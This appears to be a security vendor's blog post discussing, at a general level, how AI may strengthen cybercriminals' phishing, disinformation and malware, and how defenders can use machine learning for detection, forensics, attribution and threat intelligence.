As with any innovation, the use of AI is expected to have positive and negative effects on global culture as we know it, but I suspect that cybercrime will be one of the areas most affected. On the negative side, AI can help streamline criminals' operations, making them more efficient, sophisticated, and scalable while allowing them to evade detection and attribution. Concerning the positive impact of AI on cybersecurity, defenders, and law enforcement, can use AI to counteract advancements in illicit activity by developing new tools, tactics and strategies to automate data analysis, perform predictive detection of illicit activity and perform more effective attribution of criminal activity.

It is important to acknowledge that the AI use cases discussed in this blog encompass a range of varying complexities to achieve for both criminals and defenders. Certain use cases can be accomplished using readily available AI-enabled tools, while others demand advanced technical skills, costly infrastructure, and considerable time investments.

**Empowering cybercrime**

Cybercriminals are expected to benefit in many ways from advancements in machine learning and artificial intelligence.

A major area of impact of AI tools in cybercrime is the reduced need for human involvement in certain aspects of cybercriminal organizations, such as software development, scamming, extortions, etc., which in turn will decrease the need to recruit new members and lower operational costs due to the reduced need for headcount. While crime-related "job" postings typically find their way onto dark web forums and other anonymous channels, striving to ensure author anonymity, this practice carries significant risks as it could potentially unveil the identities and operations of criminals to whistleblowers and undercover law enforcement agents.

AI presents another avenue for cybercriminals to exploit by utilizing it to analyze enormous amounts of information, including leaked data. This analysis empowers them to identify vulnerabilities or high-value targets, enabling more precise and effective attacks that could potentially yield greater financial gains. Big data analytics is a complex undertaking necessitating significant processing power and thereby limiting its application to potentially large criminal organizations and state-sponsored actors capable of harvesting such power.

Another area of criminal activity that can thrive with AI is the development of more sophisticated phishing and social engineering attacks. This includes the creation of remarkably realistic deepfakes, deceitful websites, disinformation campaigns, fraudulent social media profiles and AI-powered scam bots. To illustrate the impact, consider an incident from 2020 wherein an AI-powered voice cloning attack successfully impersonated a CEO, resulting in the theft of more than $240,000 from a UK-based energy company. Similarly, in India criminals employed a machine learning model to analyze and mimic the writing style of a victim's email contacts to create highly personalized and persuasive phishing emails.

The utilization of AI is anticipated to also be prevalent among state-sponsored actors and prominent criminal organizations, to propagate disinformation and manipulate the public. Such tactics involve the creation and dissemination of deceptive content, including deep fakes, voice cloning, and the deployment of bots. Evidence of such practices already exists by a cybercriminal group employing AI for social media manipulation and spreading disinformation about the COVID-19 pandemic. This campaign relied on machine learning to identify emerging trends and generate highly convincing fake news articles.

The advancement of malware can also be impacted by allowing authors to streamline the process with the help of AI, enabling the creation of sophisticated and more adaptable malware. Allowing AI-powered malware to employ advanced techniques to evade detection by security solutions, utilizing "self-metamorphic" mechanisms rendering them capable of changing their operations based on the environment they operate in. Furthermore, criminals can potentially harness AI technology in the development of AI-powered malware development kits. These kits employ AI agents that learn from the latest tools, tactics, and procedures (TTPs) employed by malware authors, as well as stay updated with the latest advancements in security. An example of AI-powered malware is demonstrated by the researchers behind DeepLocker. Showcased how AI can be used to enhance targeted attacks, ensuring exploitation only when the intended target is present and to evade detection by concealing itself within benign applications.

**Counteracting cybercrime**

On the other side, cybersecurity professionals, defenders, and law enforcement agencies can harness the power of AI to counteract the advancements made in cybercrime. They can utilize AI to develop innovative tools, tactics, and strategies in their fight against malicious activities.

Areas such as threat detection and prevention will be at the forefront of AI security research. Many existing security tools, heavily rely solely on malicious signatures and user input, which render them ineffective for detecting advanced attacks. Consequently, an increasing number of vendors are turning to machine learning (ML) and AI technologies to achieve more precise and effective threat detection. Prominent examples include Cisco Secure Endpoint and Cisco Umbrella utilizing advanced machine learning to detect and mitigate suspicious behavior in an automated manner on end hosts and networks respectively. The inclusion of these technologies is likely to counter the malware being generated by AI discussed above.

Analysis of large amounts of data for the identification of indicators of compromise can be a tedious undertaking, consuming considerable time and money. As such, one area that can benefit from AI is Incident response and forensics for the automated analysis of large volumes of logs, system images, network traffic and user behavior for the identification of indicators of compromise (IOCs) and adversarial activity. AI can help speed up the investigation process, identify patterns that may be difficult to detect manually, and provide insights into the techniques and tools used by adversaries. Allowing more companies globally to have incident response and forensic capabilities.

Another potential use for AI by defenders and law enforcement alike is to enhance the attribution of criminal activity to adversaries through the analysis of multiple data points, including attack signatures, malware characteristics, and historical attack patterns, tools, tactics, and procedures. By examining these data sets, AI can identify patterns and trends that aid cybersecurity experts in narrowing down the potential origin of an attack. This attribution is valuable as it provides insights into the motives and capabilities of the attackers, allowing for a better understanding of their tactics and potential future threats. In addition, it allows defenders to more accurately identify adversaries that are leveraging tactics to evade identification by misleading attribution (e.g., use techniques, methodologies and tools another hacking group is using), which is an existing occurrence that defenders must consider when performing attribution. Such capabilities are primarily expected to be witnessed in the arsenal of state-affiliated cyber agencies as well as on a corporate level from threat intelligence providers.

ML algorithms and AI are set to expand their utilization for automated analysis and the identification of threats. Through the automated analysis of security-related data from multiple sources like threat intelligence feeds, dark web monitoring, and open-source intelligence, emerging threats can be identified and mitigated effectively. Cisco Talos has been leveraging AI for several years to automate threat intelligence operations such as the classification of similarly rendered web pages, identify spoofing attempts through logo analysis, phishing email classification based on text analytics and binary similarities analysis. Although existing work around emerging threats has proven to be highly effective, AI will further the area by allowing for more automate data collection, analysis, and correlation on a larger scale, facilitating the identification of patterns and trends that may signify new attack techniques or threat actors. This empowers cybersecurity professionals to proactively respond to emerging cyber threats by leveraging AI's ability to process and interpret vast amounts of data swiftly and accurately.

AI can also serve as a valuable tool for predictive analytics, enabling the anticipation of potential cyber threats and vulnerabilities based on historical data and patterns. By analyzing data from past attacks and adversaries, AI systems can identify common trends, patterns, or groups that may indicate or trigger future attacks. This capability empowers cybersecurity experts to take a more proactive stance to security, such as promptly patching vulnerabilities or implementing supplementary security controls, to mitigate potential risks before they are exploited by adversaries. Additionally, AI-driven predictive analytics allows for closer monitoring of adversaries' activities, enabling experts to anticipate and prepare for new attacks. By leveraging AI in this manner, cybersecurity professionals can enhance their defenses and stay one step ahead of evolving threats. A sizable number of cybercrime predictive research exists, highlighting how to practically use AI to support cybercrime research, as well as how to perform predictive analysis based on social and economic factors using the Bayesian and Markov Theories.

The rise of AI presents new challenges and great opportunities as its user base and applications continue to expand. The effective and targeted utilization of AI-related technologies will play a pivotal role for cybersecurity experts and law enforcement agencies in detecting, defending against, and attributing digital criminal behavior. By harnessing the power of AI, these entities can enhance their capabilities in combating evolving threats and ensuring the security of digital ecosystems. As the landscape of cybercrime evolves, embracing AI will be instrumental in staying ahead of adversaries.